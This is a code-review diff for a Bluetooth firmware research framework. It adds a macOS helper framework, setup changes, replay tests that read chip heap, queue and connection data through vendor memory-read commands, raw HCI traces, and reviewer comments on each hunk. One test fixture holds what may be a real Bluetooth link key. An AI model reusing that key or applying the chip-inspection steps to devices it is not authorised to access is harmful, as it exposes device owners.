NSData *data = [NSData dataWithBytes:&message->eventParameterBytes length:size];
return data;
}
NS_ASSUME_NONNULL_END
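Review bot: in IOBluetoothHCIEventParameterData the expression `&message->eventParameterBytes` takes the address of the pointer field itself, so the NSData is built from whatever bytes sit inline at that offset of the message, not from the buffer a `void *` would point at. That only works if the driver lays the event parameters out inline directly after `dataInfo`; either declare the field as a flexible array member (`unsigned char eventParameterBytes[];`) so the type says what the code does, or add a comment stating that the inline layout is intended and that `parameterSize` is taken from the driver as-is. Minor: the third parameter of BluetoothHCISendRawCommand is spelled `commmandSize`.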
@@ -0,0 +1,24 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>CFBundleDevelopmentRegion</key>
<string>$(DEVELOPMENT_LANGUAGE)</string>
<key>CFBundleExecutable</key>
<string>$(EXECUTABLE_NAME)</string>
<key>CFBundleIdentifier</key>
<string>$(PRODUCT_BUNDLE_IDENTIFIER)</string>
<key>CFBundleInfoDictionaryVersion</key>
<string>6.0</string>
<key>CFBundleName</key>
<string>$(PRODUCT_NAME)</string>
<key>CFBundlePackageType</key>
<string>FMWK</string>
<key>CFBundleShortVersionString</key>
<string>1.0</string>
<key>CFBundleVersion</key>
<string>$(CURRENT_PROJECT_VERSION)</string>
<key>NSHumanReadableCopyright</key>
<string>Copyright © 2019 Davide Toldo. All rights reserved.</string>
</dict>
</plist>
@@ -0,0 +1,37 @@
//
// IOBluetoothExtendedTests.m
// IOBluetoothExtendedTests
//
// Created by Davide Toldo on 06.07.19.
// Copyright © 2019 Davide Toldo. All rights reserved.
//
#import <XCTest/XCTest.h>
@interface IOBluetoothExtendedTests : XCTestCase
@end
@implementation IOBluetoothExtendedTests
- (void)setUp {
// Put setup code here. This method is called before the invocation of each test method in the class.
}
- (void)tearDown {
// Put teardown code here. This method is called after the invocation of each test method in the class.
}
- (void)testExample {
// This is an example of a functional test case.
// Use XCTAssert and related functions to verify your tests produce the correct results.
}
- (void)testPerformanceExample {
// This is an example of a performance test case.
[self measureBlock:^{
// Put the code you want to measure the time of here.
}];
}
@end
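Review bot: this test target is the unmodified Xcode template; `testExample` and `testPerformanceExample` contain no assertions, so the IOBluetoothExtended framework ships with no real coverage. Either add a test that builds an IOBluetoothHCIEventNotificationMessage with a known `parameterSize` and checks that IOBluetoothHCIEventParameterData returns exactly those bytes, or drop the target until such a test exists.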
@@ -0,0 +1,22 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>CFBundleDevelopmentRegion</key>
<string>$(DEVELOPMENT_LANGUAGE)</string>
<key>CFBundleExecutable</key>
<string>$(EXECUTABLE_NAME)</string>
<key>CFBundleIdentifier</key>
<string>$(PRODUCT_BUNDLE_IDENTIFIER)</string>
<key>CFBundleInfoDictionaryVersion</key>
<string>6.0</string>
<key>CFBundleName</key>
<string>$(PRODUCT_NAME)</string>
<key>CFBundlePackageType</key>
<string>BNDL</string>
<key>CFBundleShortVersionString</key>
<string>1.0</string>
<key>CFBundleVersion</key>
<string>1</string>
</dict>
</plist>

@@ -0,0 +1,23 @@
macOS Setup
-----------
```
brew install unicorn
pip install pwntools
pip install pyobjc
open internalblue/macos-framework/IOBluetoothExtended/IOBluetoothExtended.xcodeproj/
```
⌘ + B
```
python internalblue/cli.py
```
If you want to use ARM assembly and disassembly, which is required for some patches and debugging:
* brew install https://github.com/Gallopsled/pwntools-binutils/raw/master/osx/binutils-arm.rb
* Xcode 10.2.1
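Review bot: `pip install pwntools` resolves to the latest stable release, while the setup.py hunk in this same change requires `pwntools>=4.2.0.dev0`; the setup steps should install the package itself (`pip install -e .`, or `pip install -e ".[macoscore]"` to pull in pyobjc as well) so the dev-release requirement and pyelftools are honoured. The bare `⌘ + B` line should say that it builds IOBluetoothExtended in the Xcode project opened on the previous line, and the `Xcode 10.2.1` bullet should say whether that is a minimum or the only tested version.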
@@ -1 +0,0 @@
pwntools==3.12.2
@@ -11,8 +11,12 @@ setup(name='internalblue',
license='MIT',
packages=['internalblue', 'internalblue/fw'],
install_requires=[
'pwntools',
'pwntools>=4.2.0.dev0',
'pyelftools',
],
extras_require={
"macoscore": ["pyobjc"],
},
entry_points = {
'console_scripts': ['internalblue=internalblue.cli:internalblue_cli']
},
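Review bot: replacing the pinned `pwntools==3.12.2` from requirements.txt with `'pwntools>=4.2.0.dev0'` leaves an open-ended lower bound on a development release; since the Python 3 port depends on pwntools 4.x byte handling, add an upper bound (for example `'pwntools>=4.2.0.dev0,<5'`) so a future major release cannot silently break the package. Also, the tests added in this change import `internalblue.objects.connection_information`, but `packages` still lists only `'internalblue'` and `'internalblue/fw'`, so `internalblue.objects` is not installed from a wheel; use `find_packages()` or add the subpackage, and write the existing entry as the dotted name `internalblue.fw`.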
@@ -0,0 +1,17 @@
import unittest
from internalblue.testcore import testCore
class DummyCoreTest(unittest.TestCase):
def setUp(self):
t = testCore(log_level='debug', data_directory='/tmp')
dev = t.device_list()[0]
reference = dev[0]
reference.interface = dev[1]
self.assert_(reference.connect(), 'Connect failed')
self.reference = reference
def tearDown(self):
self.reference.shutdown()
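Review bot: `self.assert_(...)` is the deprecated alias of `assertTrue` (a DeprecationWarning on Python 3, removed in 3.12); use `self.assertTrue(reference.connect(), 'Connect failed')`. DummyCoreTest also defines only `setUp` and `tearDown`, so unittest collects no test method from it and the connect/shutdown path is never exercised; add at least one `test_*` method, and give testCore a per-test directory from `tempfile.mkdtemp()` instead of the shared `/tmp`.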
@@ -0,0 +1,12 @@
#!/bin/env sh
line=$(head -n 1 "$1")
if [[ $line == \#* ]] ;
then
python -m internalblue.cli --device hci0 --replay "$1" --commands "$(echo $line | tr -d "#"); quit" 2>&1 | grep AssertionError || exit 0 && exit 1
else
echo "Trace $1 has no command specified"
fi
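Review bot: the exit logic reports any failure that is not an `AssertionError` as a pass: if the replay dies with an ImportError or a socket error, `grep AssertionError` matches nothing, `|| exit 0` fires and the trace is marked green. Check the python command's own status as well (under bash, `set -o pipefail` makes the pipeline fail when python does, and `if ... | grep -q AssertionError; then exit 1; fi` states the intent more plainly than the `|| exit 0 && exit 1` chain). The shebang `#!/bin/env sh` also points at a path that normally does not exist (env lives in `/usr/bin/env`), and `[[ $line == \#* ]]` is a bash construct that fails under a POSIX sh such as dash; use `#!/usr/bin/env bash` or `case "$line" in \#*) ...; esac`, and quote `"$line"` in the `echo`.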
@@ -0,0 +1,282 @@
from __future__ import print_function
from internalblue.cli import _parse_argv
from internalblue.hcicore import HCICore
import os
import nose
try:
from typing import List, Optional, Any, TYPE_CHECKING, Tuple
except ImportError:
pass
def test_info_heap_new():
dummy = [
{
"index": 0,
"capacity": 32,
"address": 2100380,
"next": 2100412,
"memory_size": 1152,
"buffer_list": 2190960,
"memory": 2190864,
"buffer_size": 32,
"buffer_headers": {
2191872: 2134443254,
2191620: 2037880954,
2191368: 375085499,
2191116: 3147300663,
2190864: 0,
2191764: 264196083,
2191512: 2509895076,
2191260: 2520551584,
2191008: 0,
2191908: 1846542368,
2191656: 1757769142,
2191404: 3932721686,
2191152: 2191184,
2190900: 28735,
2191800: 2840650003,
2191548: 1443923039,
2191296: 1489683938,
2191044: 4066066958,
2191944: 1913651233,
2191692: 152195353,
2191440: 2191472,
2191188: 1557416373,
2190936: 302056974,
2191836: 649087106,
2191584: 3228135896,
2191332: 3061215438,
2191080: 720823376,
2191980: 2196903397,
2191728: 2191760,
2191476: 2016717863,
2191224: 733933656,
2190972: 101581052
},
"list_length": 28
},
{
"index": 1,
"capacity": 50,
"address": 2100412,
"next": 2100444,
"memory_size": 5000,
"buffer_list": 2191888,
"memory": 2191888,
"buffer_size": 96,
"buffer_headers": {
2194688: 2418054699,
2196288: 1950181917,
2192388: 998902997,
2193288: 1237870693,
2196588: 3682344019,
2194188: 3476501705,
2191888: 2191984,
2195288: 1169168150,
2192788: 733035576,
2193688: 212170382,
2195588: 4256985711,
2194588: 2553343043,
2196688: 2197224,
2192288: 1364917638,
2195888: 19938058,
2193188: 1183181508,
2194088: 2389621397,
2196188: 1101316817,
2194988: 4119138959,
2192688: 3404258821,
2196488: 2957618219,
2193588: 1015303433,
2194488: 1542989588,
2195188: 334177442,
2192188: 3048389179,
2193088: 4249806944,
2195488: 1476670297,
2193988: 4205996809,
2196788: 0,
2194888: 1063521161,
2195788: 1587397832,
2192588: 3951930416,
2193488: 3182543110,
2196088: 1404536822,
2194388: 3962928810,
2192088: 1508747568,
2196388: 2481150443,
2192988: 3794218756,
2193888: 2230011074,
2195088: 2388733849,
2194788: 319481313,
2192488: 1066099460,
2195388: 2397324227,
2193388: 3268540448,
2194288: 2194384,
2195688: 443293108,
2191988: 3365837461,
2192888: 2725717105,
2195988: 954670552,
2193788: 2274473962
},
"list_length": 50
},
{
"index": 2,
"capacity": 12,
"address": 2100444,
"next": 2169260,
"memory_size": 3264,
"buffer_list": 2196688,
"memory": 2196688,
"buffer_size": 268,
"buffer_headers": {
2196960: 1868719728,
2198048: 2301952667,
2197504: 2764580300,
2198592: 4031749240,
2199408: 3141828370,
2199680: 2673196138,
2197776: 655413012,
2196688: 2197224,
2198864: 483218198,
2199136: 2070409995,
2197232: 4269595008,
2198320: 2960663615
},
"list_length": 11
},
{
"index": 3,
"capacity": 4,
"address": 2169260,
"next": 2169292,
"memory_size": 4288,
"buffer_list": 2199904,
"memory": 2199904,
"buffer_size": 1068,
"buffer_headers": {
2199904: 2200972,
2200976: 3538041113,
2202048: 1981831315,
2203120: 2664647264
},
"list_length": 4
},
{
"index": 4,
"capacity": 16,
"address": 2169292,
"next": 2169324,
"memory_size": 17536,
"buffer_list": 2204176,
"memory": 2204176,
"buffer_size": 1092,
"buffer_headers": {
2206368: 3081486871,
2208560: 2201211482,
2218424: 1142812043,
2210752: 1735894938,
2219520: 1997110991,
2207464: 3467810309,
2220616: 3465059190,
2217328: 3406578824,
2215136: 2543784863,
2204176: 2205268,
2209656: 3726451979,
2214040: 3051833507,
2211848: 3382482014,
2205272: 2465189202,
2212944: 2900433384,
2216232: 619500542
},
"list_length": 16
},
{
"index": 5,
"capacity": 15,
"address": 2169324,
"next": 2169356,
"memory_size": 4020,
"buffer_list": 2221648,
"memory": 2221648,
"buffer_size": 264,
"buffer_headers": {
2222720: 4187811300,
2223792: 71320053,
2223524: 2131726092,
2222184: 983003111,
2224060: 1514897371,
2222988: 2920869383,
2225132: 670722248,
2225400: 4011899155,
2221648: 2221912,
2224328: 1327684221,
2222452: 1691084254,
2223256: 2278527172,
2224596: 3213868993,
2221916: 2666878639,
2224864: 4293236507
},
"list_length": 15
},
{
"index": 6,
"capacity": 15,
"address": 2169356,
"next": 0,
"memory_size": 4020,
"buffer_list": 2225608,
"memory": 2225608,
"buffer_size": 264,
"buffer_headers": {
2226144: 2468503925,
2228288: 3769100033,
2226948: 3003019165,
2225608: 2225872,
2228556: 1848533574,
2226412: 19831529,
2229360: 3069868169,
2227216: 2022414238,
2227752: 2727841579,
2228824: 1909490602,
2225876: 2300688060,
2226680: 210906155,
2228020: 3166977216,
2227484: 2262736138,
2229092: 1991768492
},
"list_length": 15
}
]
trace = os.path.join(os.path.dirname(os.path.abspath(__file__)),
'traces/hcicore/dictionary_tests/info_heap_new.trace')
args = _parse_argv('')
args.device = 'adb_replay'
args.replay = trace
data_directory = os.path.expanduser('~') + '/.internalblue'
if not os.path.exists(data_directory):
os.mkdir(data_directory)
from internalblue.socket_hooks import hook, ReplaySocket
hook(HCICore, ReplaySocket, filename=args.replay)
connection_methods = [HCICore(log_level='info', data_directory=data_directory, replay=True)]
devices = [] # type: List[DeviceTuple]
devices = connection_methods[0].device_list()
device = devices[0]
reference = device[0]
reference.interface = device[1]
reference.connect()
information = reference.readHeapInformation()
print(information)
nose.tools.assert_equal(information, dummy)
reference.shutdown()
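Review bot: `reference.shutdown()` sits after `nose.tools.assert_equal`, so when the comparison fails the hooked HCICore is never shut down; put `connect()`/`readHeapInformation()` in a `try` and the shutdown in `finally`. `args.device = 'adb_replay'` is set although this test hooks HCICore and replays `traces/hcicore/...`, and `args` is not read after `hook(...)`, so either drop the `_parse_argv` block or use the matching device name. `nose` is imported but does not appear in the `install_requires` or `extras_require` of the setup.py hunk, and the `# type: List[DeviceTuple]` comment names DeviceTuple without importing it (test_info_conn_7 does `from internalblue import DeviceTuple`).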
@@ -0,0 +1,234 @@
from __future__ import print_function
from internalblue.cli import _parse_argv
from internalblue.adbcore import ADBCore
import os
import nose
try:
from typing import List, Optional, Any, TYPE_CHECKING, Tuple
except ImportError:
pass
def test_info_heap_old():
dummy = [
{
'index':0,
'buffer_headers': {
2194080: 0,
2193828: 2121160,
2193864: 2194008,
2193900: 2194044,
2193936: 2193864,
2193972: 2121160,
2194008: 2193900,
2194044: 2194080
},
'capacity': 8,
'address': 2121160,
'next': 2121208,
'memory_size': 288,
'waitlist_length': 0,
'buffer_list': 2193828,
'memory': 2193828,
'buffer_size': 32,
'prev': 2157672,
'list_length': 7,
'thread_waitlist': 0
},
{
'index': 1,
'buffer_headers': {
2194592: 0,
2194116: 2194184,
2194184: 2194252,
2194252: 2194320,
2194320: 2194388,
2194388: 2194456,
2194456: 2194524,
2194524: 2194592
},
'capacity': 8,
'address': 2121208,
'next': 2121256,
'memory_size': 544,
'waitlist_length': 0,
'buffer_list': 2194184,
'memory': 2194116,
'buffer_size': 64,
'prev': 2121160,
'list_length': 7,
'thread_waitlist': 0
},
{
'index': 2,
'buffer_headers': {
2196000: 2196268,
2197072: 0,
2194660: 2194928,
2195464: 2195732,
2196268: 2196536,
2194928: 2195196,
2195732: 2196000,
2196536: 2196804,
2196804: 2197072,
2195196: 2195464
},
'capacity': 10,
'address': 2121256,
'next': 2121352,
'memory_size': 2680,
'waitlist_length': 0,
'buffer_list': 2194660,
'memory': 2194660,
'buffer_size': 264,
'prev': 2121208,
'list_length': 10,
'thread_waitlist': 0
},
{
'index': 3,
'buffer_headers': {
2214480: 2215548,
2215548: 2216616,
2216616: 0,
2213412: 2214480
},
'capacity': 4,
'address': 2121352,
'next': 2121304,
'memory_size': 4272,
'waitlist_length': 0,
'buffer_list': 2213412,
'memory': 2213412,
'buffer_size': 1064,
'prev': 2121256,
'list_length': 4,
'thread_waitlist': 0
},
{
'index': 4,
'buffer_headers': {
2234124: 0,
2231932: 2233028,
2224260: 2225356,
2219876: 2220972,
2226452: 2227548,
2223164: 2224260,
2228644: 2229740,
2220972: 2222068,
2225356: 2226452,
2230836: 2231932,
2233028: 2234124,
2222068: 2223164,
2227548: 2228644,
2217684: 2218780,
2218780: 2219876,
2229740: 2230836
},
'capacity': 16,
'address': 2121304,
'next': 2157624,
'memory_size': 17536,
'waitlist_length': 0,
'buffer_list': 2217684,
'memory': 2217684,
'buffer_size': 1092,
'prev': 2121352,
'list_length': 16,
'thread_waitlist': 0
},
{
'index': 5,
'buffer_headers': {
2235264: 2235308,
2235616: 2235660,
2235396: 2235440,
2235528: 2235572,
2235660: 2235704,
2235308: 2235352,
2235440: 2235484,
2235704: 2235748,
2235792: 2235836,
2235220: 2235264,
2235748: 2235792,
2235352: 2235396,
2235572: 2235616,
2235836: 0,
2235484: 2235528
},
'capacity': 15,
'address': 2157624,
'next': 2157672,
'memory_size': 660,
'waitlist_length': 0,
'buffer_list': 2235220,
'memory': 2235220,
'buffer_size': 40,
'prev': 2121304,
'list_length': 15,
'thread_waitlist': 0
},
{
'index': 6,
'buffer_headers': {
2236096: 2236132,
2236240: 2236276,
2236132: 2236168,
2236384: 0,
2235880: 2235916,
2236204: 2236240,
2236348: 2236384,
2235916: 2235952,
2235952: 2235988,
2236168: 2236204,
2236312: 2236348,
2235988: 2236024,
2236024: 2236060,
2236276: 2236312,
2236060: 2236096
},
'capacity': 15,
'address': 2157672,
'next': 2121160,
'memory_size': 540,
'waitlist_length': 0,
'buffer_list': 2235880,
'memory': 2235880,
'buffer_size': 32,
'prev': 2157624,
'list_length': 15,
'thread_waitlist': 0
}]
trace = os.path.join(os.path.dirname(os.path.abspath(__file__)),
'traces/adbcore/dictionary_tests/info_heap_old.trace')
args = _parse_argv('')
args.device = 'adb_replay'
args.replay = trace
data_directory = os.path.expanduser('~') + '/.internalblue'
if not os.path.exists(data_directory):
os.mkdir(data_directory)
from internalblue.socket_hooks import hook, ReplaySocket
hook(ADBCore, ReplaySocket, filename=args.replay)
connection_methods = [ADBCore(log_level='info', data_directory=data_directory, replay=True)]
devices = [] # type: List[DeviceTuple]
devices = connection_methods[0].device_list()
device = devices[0]
reference = device[0]
reference.interface = device[1]
reference.connect()
information = reference.readHeapInformation()
print(information)
nose.tools.assert_equal(information, dummy)
reference.shutdown()
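Review bot: the 190-line `dummy` literal mirrors the one in the hcicore heap test and drowns the few keys that distinguish the older firmware layout (`prev`, `waitlist_length`, `thread_waitlist`); move the expected values into a fixture module next to the `.trace` file so the test body is only the replay and the comparison (the `buffer_headers` dicts have integer keys, so JSON is not a drop-in format). The same try/finally and unused-`args` points as in the hcicore heap test apply here.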
@@ -0,0 +1,52 @@
from __future__ import print_function
from internalblue.cli import _parse_argv
from internalblue.adbcore import ADBCore
from internalblue.objects.connection_information import ConnectionInformation
import os
import nose
try:
from typing import List, Optional, Any, TYPE_CHECKING, Tuple
from internalblue import DeviceTuple
except ImportError:
pass
def test_info_conn_7():
dummy = ConnectionInformation(7, bytearray.fromhex('0023023a1a2e'), 0, True, 0xc,
bytearray.fromhex('e98a5eaaff39ecb5ce4447590dfb73a4'), 16,
bytearray.fromhex('dbea2d9c47bc1aa6afe664ff31591aa6'), -87,
bytearray.fromhex('0a00c821ffff8ffa'), bytearray.fromhex('9bff598701000000'),
bytearray.fromhex('00'))
trace = os.path.join(os.path.dirname(os.path.abspath(__file__)),
'traces/adbcore/dictionary_tests/info_conn_7.trace')
args = _parse_argv('')
args.device = 'adb_replay'
args.replay = trace
data_directory = os.path.expanduser('~') + '/.internalblue'
if not os.path.exists(data_directory):
os.mkdir(data_directory)
from internalblue.socket_hooks import hook, ReplaySocket
hook(ADBCore, ReplaySocket, filename=args.replay)
connection_methods = [ADBCore(log_level='info', data_directory=data_directory, replay=True)]
devices = [] # type: List[DeviceTuple]
devices = connection_methods[0].device_list()
device = devices[0]
reference = device[0]
reference.interface = device[1]
reference.connect()
information = reference.readConnectionInformation(7)
print(information)
nose.tools.assert_dict_equal(vars(information), vars(dummy))
reference.shutdown()
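Review bot: ConnectionInformation is constructed with thirteen positional arguments, so a reader cannot tell which bytearray is the link key and which the remote address without the class definition; pass them by keyword. Worth confirming before merge: the expected values include a BD address (`0023023a1a2e`) and a 16-byte link key (`e98a5eaaff39ecb5ce4447590dfb73a4`); if these were captured from a real pairing rather than synthesized, the link key is a credential for that device pair and the device should be re-paired or the trace scrubbed before it lands in a public repository.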
@@ -0,0 +1,50 @@
from __future__ import print_function
from internalblue.cli import _parse_argv
from internalblue.adbcore import ADBCore
from internalblue.objects.connection_information import ConnectionInformation
import os
import nose
try:
from typing import List, Optional, Any, TYPE_CHECKING, Tuple
except ImportError:
pass
def test_info_conn_9():
dummy = ConnectionInformation(9, bytearray.fromhex('000000000000'), 0, False, 12,
bytearray.fromhex('00000000000000000000000000000000'), 0, b'', -87,
bytearray.fromhex('0000000000000000'),
bytearray.fromhex('0000000000000000'), bytearray.fromhex('00'))
trace = os.path.join(os.path.dirname(os.path.abspath(__file__)),
'traces/adbcore/dictionary_tests/info_conn_9.trace')
args = _parse_argv('')
args.device = 'adb_replay'
args.replay = trace
data_directory = os.path.expanduser('~') + '/.internalblue'
if not os.path.exists(data_directory):
os.mkdir(data_directory)
from internalblue.socket_hooks import hook, ReplaySocket
hook(ADBCore, ReplaySocket, filename=args.replay)
connection_methods = [ADBCore(log_level='info', data_directory=data_directory, replay=True)]
devices = [] # type: List[DeviceTuple]
devices = connection_methods[0].device_list()
device = devices[0]
reference = device[0]
reference.interface = device[1]
reference.connect()
information = reference.readConnectionInformation(9)
print(information)
nose.tools.assert_dict_equal(vars(information), vars(dummy))
reference.shutdown()
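Review bot: the link key is `b''` here but a `bytearray` in every other field and in test_info_conn_7, and the key size is written `12` here and `0xc` there; pick one spelling in both tests so a diff between the connected and empty-slot cases shows only the real differences. The `from internalblue import DeviceTuple` import present in test_info_conn_7 is missing here although the `# type:` comment references it.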
@@ -0,0 +1,63 @@
from __future__ import print_function
from internalblue.cli import _parse_argv
from internalblue.adbcore import ADBCore
from internalblue.objects.queue_element import QueueElement
import os
import nose
try:
from typing import List, Optional, Any, TYPE_CHECKING, Tuple
except ImportError:
pass
def test_info_queue():
dummy = [
QueueElement(0, 2123152, 4, 16, 0, 16, 2123208, 2123272, 2123268, 2123268, 0, 0, 2123332, 2141676, 'tran_HCIEvent'),
QueueElement(1, 2123332, 8, 31, 0, 31, 2123388, 2123636, 2123436, 2123436, 0, 0, 2123636, 2123152, 'tran_ACLData'),
QueueElement(2, 2123636, 4, 3, 0, 3, 2123692, 2123704, 2123692, 2123692, 0, 0, 2123704, 2123332, 'tran_SCOData'),
QueueElement(3, 2123704, 4, 31, 0, 31, 2123760, 2123884, 2123760, 2123760, 0, 0, 2123884, 2123636, 'tran_UartBridgeNonHCIEvent'),
QueueElement(4, 2123884, 4, 20, 0, 20, 2123940, 2124020, 2124000, 2124000, 0, 0, 2124020, 2123704, 'tran_DiagData'),
QueueElement(5, 2124020, 8, 8, 0, 8, 2124076, 2124140, 2124076, 2124076, 0, 0, 2124140, 2123884, 'tran_HIDUsbKBEvt'),
QueueElement(6, 2124140, 8, 6, 0, 6, 2124196, 2124244, 2124196, 2124196, 0, 0, 2124244, 2124020, 'tran_HIDUsbMSEvt'),
QueueElement(7, 2124244, 8, 1, 0, 1, 2100496, 2100504, 2100496, 2100496, 0, 0, 2124300, 2124140, 'tran_HIDUsbMSCtrl'),
QueueElement(8, 2124300, 8, 1, 0, 1, 2100504, 2100512, 2100504, 2100504, 0, 0, 2124356, 2124244, 'tran_HIDUsbKBCtrl'),
QueueElement(9, 2124356, 8, 32, 0, 32, 2124412, 2124668, 2124412, 2124412, 0, 0, 2110352, 2124300, 'tran_HidAuxData'),
QueueElement(10, 2110352, 8, 12, 0, 12, 2192284, 2192380, 2192300, 2192300, 0, 0, 2120560, 2124356, 'lm_Cmd'),
QueueElement(11, 2120560, 4, 8, 0, 8, 2192380, 2192412, 2192400, 2192400, 0, 0, 2110408, 2110352, 'hci_HciCommand'),
QueueElement(12, 2110408, 8, 19, 0, 19, 2192412, 2192564, 2192412, 2192412, 0, 0, 2118068, 2120560, 'lm_deferredAction'),
QueueElement(13, 2118068, 8, 6, 0, 6, 2192564, 2192612, 2192564, 2192564, 0, 0, 2141588, 2110408, 'lrmmsm_cmd'),
QueueElement(14, 2141588, 4, 8, 0, 8, 2141644, 2141676, 2141644, 2141644, 0, 0, 2141676, 2118068, 'liteHostEvent'),
QueueElement(15, 2141676, 4, 16, 0, 16, 2141732, 2141796, 2141732, 2141732, 0, 0, 2123152, 2141588, 'litehostRcvdL2capData')
]
trace = os.path.join(os.path.dirname(os.path.abspath(__file__)),
'traces/adbcore/dictionary_tests/info_queue.trace')
args = _parse_argv('')
args.device = 'adb_replay'
args.replay = trace
data_directory = os.path.expanduser('~') + '/.internalblue'
if not os.path.exists(data_directory):
os.mkdir(data_directory)
from internalblue.socket_hooks import hook, ReplaySocket
hook(ADBCore, ReplaySocket, filename=args.replay)
connection_methods = [ADBCore(log_level='info', data_directory=data_directory, replay=True)]
devices = [] # type: List[DeviceTuple]
devices = connection_methods[0].device_list()
device = devices[0]
reference = device[0]
reference.interface = device[1]
reference.connect()
information = reference.readQueueInformation()
print(information)
nose.tools.assert_equal([vars(element) for element in information], [vars(element) for element in dummy])
reference.shutdown()
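Review bot: each QueueElement takes fifteen positional arguments, so the pointer fields (queue address, item pointers, next/prev links) are unlabelled; keyword arguments or a small helper would make the expected values reviewable. More generally, the five dictionary tests repeat the same twenty-line connect/replay boilerplate; `.testwrapper`, which the suite generator in this change already imports `trace_test` and `get_trace_path_cmd_tuple` from, is the natural home for a shared helper that hooks the core, replays a trace and returns the connected reference, with shutdown handled in a `finally`.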
@@ -0,0 +1,63 @@
from __future__ import print_function
from __future__ import absolute_import
from .testwrapper import trace_test, get_trace_path_cmd_tuple
import os
tracedir = os.path.dirname(__file__)
#cores = ['macoscore', 'ioscore', 'adbcore', 'hcicore']
import unittest
def generate_test_suite_from_traces():
def generate_test_from_file(core, tracefile):
tracepath, cmd = get_trace_path_cmd_tuple(core, tracefile)
def test():
print("Running test %s " % (tracefile[:-6]))
trace_test(core, tracepath, cmd)
# Rename the function to the tracefile name without .trace suffix
test.__name__ = tracefile[:-6]
if cmd:
return test
else:
return unittest.skip("No command specified in trace {}".format(tracepath))(test)
suite = unittest.TestSuite()
for core in os.listdir(tracedir):
if os.path.isdir(os.path.join(tracedir,core)):
core_suite = unittest.TestSuite()
for tracefile in os.listdir(os.path.join(tracedir, core)):
if tracefile.endswith(".trace"):
core_suite.addTest(
unittest.FunctionTestCase(generate_test_from_file(core, tracefile), description=tracefile))
suite.addTest(core_suite)
return suite
# test_all_traces()
def load_tests(loader, standard_tests, n):
"""
This method is called by test frameworks to supply a testsuite instead of the test framework collecting them itself.
This allows use to automatically generate a proper test for each trace in the subdirectory that has a command specified.
Those tests are then run by the framework in the usual way which integrates with IDEs
TODO: Document PyCharm Setup
"""
trace_suite = generate_test_suite_from_traces()
return trace_suite
if __name__ == '__main__':
suite = generate_test_suite_from_traces()
unittest.TextTestRunner().run(suite)
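Review bot: `os.listdir` order is arbitrary, so the generated suite runs traces in a different order on different filesystems and two test reports are hard to diff; wrap both `os.listdir` calls in `sorted()`. The `load_tests` protocol names its third argument `pattern`, not `n`, and the docstring should read "allows us to"; `#cores = [...]` and `# test_all_traces()` are dead code, and the `print("Running test ...")` inside `test()` duplicates what `description=tracefile` already gives the runner.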
@@ -0,0 +1,21 @@
TX 010300011000
RX 0000000400000004000000020000000000e26b46e2c309cc
RX 01011000
RX 0000000f0000000f000000030000000000e26b46e2c3274f
RX 04
RX 0e0c01011000075301070f000961
TX 070200f001
TX 0108004dfc05b0402000fb
RX 000000090000000900000002
RX 0000000000e26b46e2d06c12
RX 014dfc05b0402000fb
RX 0000010200000102000000030000000000e26b46
RX e2d093f7
RX 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
TX 0108004dfc05ab41200051
RX 000000090000000900000002
RX 0000000000e26b46e2d18faa
RX 014dfc05ab41200051
RX 0000005800000058000000030000000000e26b46e2d1ade2
RX 040e55014dfc000000000000000000000000000000000000a4000800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000400000001000000
Socket closed
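Review bot: this trace has no leading `#command` line, so `generate_test_from_file` registers it as skipped ("No command specified in trace") and the sh wrapper prints "has no command specified"; either prepend the command that produced it, as the other traces in this change do (`#info connections`, `# info heap`), or keep it out of the directory the suite generator scans.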
@@ -0,0 +1,24 @@
#info connections
TX 010300011000
RX 0000000400000004000000020000000000e269c211af9287
RX 01011000
RX 0000000f0000000f000000030000000000e269c211afc606
RX 040e0c01011000075301070f000961
TX 070200f001
TX 0108004dfc0548432000fb
RX 0000000900000009000000020000000000e269c2
RX 11cde3be
RX 014dfc0548432000fb
RX 00000102
RX 000001020000000300000000
RX 00e269c211ce175c
RX 04
RX 0eff014dfc000900000000000000000000000000000000000000000000000000777700c91000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005000000007d0000007d00000c001eff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002800000000000020000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffff0000000100000000000000f0ff0000000000000000000001c4000000000000
TX 0108004dfc054344200051
RX 0000000900000009000000020000000000e269c2
RX 11cf5a52
RX 014dfc054344200051
RX 000000580000005800000003
RX 0000000000e269c211cf8917
RX 040e55014dfc00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
Socket closed
@@ -0,0 +1,685 @@
# info heap
TX 010300011000
RX 0000000400000004000000020000000000e269c200a6dc56
RX 01011000
RX 0000000f0000000f000000030000000000e269c2
RX 00a717ec
RX 04
RX 0e0c01011000075301070f000961
TX 070200f001
TX 0108004dfc059430200004
RX 000000030000000300000003
RX 0000000000e269c200a87965
RX 07f001
RX 00000009000000090000000200000000
RX 00e269c200a8e193
RX 01
RX 4dfc059430200004
RX 0000000b0000000b
RX 000000030000000000e269c2
RX 00a918e2
RX 040e08014dfc00c85d2000
TX 0108004dfc05c85d200030
RX 000000090000000900000002
RX 0000000000e269c200aab793
RX 014dfc05c85d200030
RX 00000037
RX 000000370000000300000000
RX 00e269c200aaf0ec
RX 04
RX 0e34014dfc00434f4c42000000000700000008000000a4792100a479210020010000200000000000000000000000f85d200068ec2000
TX 0108004dfc05a479210004
RX 000000090000000900000002
RX 0000000000e269c200acb1ba
RX 014dfc05a479210004
RX 0000000b
RX 0000000b0000000300000000
RX 00e269c200ace5c2
RX 04
RX 0e08014dfc00c85d2000
TX 0108004dfc05c879210004
RX 000000090000000900000002
RX 0000000000e269c200ae2501
RX 014dfc05c879210004
RX 0000000b0000000b0000000300000000
RX 00e269c200ae5915
RX 04
RX 0e08014dfc00587a2100
TX 0108004dfc05ec79210004
RX 0000000900000009000000020000000000e269c200b01eae
RX 01
RX 4dfc05ec79210004
RX 0000000b
RX 0000000b0000000300000000
RX 00e269c200b04d6c
RX 04
RX 0e08014dfc007c7a2100
TX 0108004dfc05107a210004
RX 0000000900000009000000020000000000e269c200b19061
RX 014dfc05107a210004
RX 0000000b
